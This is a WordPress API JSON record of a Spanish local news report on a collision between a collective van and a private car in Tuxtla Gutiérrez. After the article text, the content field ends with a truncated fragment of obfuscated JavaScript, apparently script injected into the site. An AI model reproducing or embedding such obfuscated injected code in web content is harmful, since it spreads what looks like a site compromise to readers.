{"id":1541,"date":"2022-04-22T23:12:07","date_gmt":"2022-04-22T23:12:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1541"},"modified":"2022-04-22T23:12:08","modified_gmt":"2022-04-22T23:12:08","slug":"colectivo-y-particular-colisionan-en-la-9a-sur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1541","title":{"rendered":"Colectivo y particular colisionan en la 9a Sur"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220422-WA0015-1024x577.jpg\" alt=\"\" class=\"wp-image-1543\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220422-WA0015-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220422-WA0015-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220422-WA0015-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220422-WA0015-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220422-WA0015.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 22 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una unidad de transporte colectivo que cubre la ruta Tuxtla-Chiapa de Corzo y un autom\u00f3vil particular VW Jetta protagonizaron una fuerte colisi\u00f3n sobre la Novena Sur, a la altura de la 16a Oriente.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 este vienes por la tarde cuando la Urvan circulaba en la Avenida Principal, y de acuerdo a la versi\u00f3n del conductor el Jetta circulaba de norte a sur de reversa sin precaucion lo que ocasion\u00f3 el fuerte choque.<\/p>\n\n\n\n<p>En su defensa la conductora del particular dijo que el colectivo circulaba sin precauci\u00f3n y se impact\u00f3 en la parte trasera.<\/p>\n\n\n\n<p>Al no llegar a un acuerdo armonioso las dos unidades fueron puestas a disposici\u00f3n del Ministerio P\u00fablico en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 22 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una unidad de transporte colectivo que cubre la ruta Tuxtla-Chiapa de Corzo y un autom\u00f3vil particular VW Jetta protagonizaron una fuerte colisi\u00f3n sobre la Novena Sur, a la altura de la 16a Oriente. Este hecho ocurri\u00f3 este vienes por la tarde cuando la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1543,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1541","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1541"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1541\/revisions"}],"predecessor-version":[{"id":1544,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1541\/revisions\/1544"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1543"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}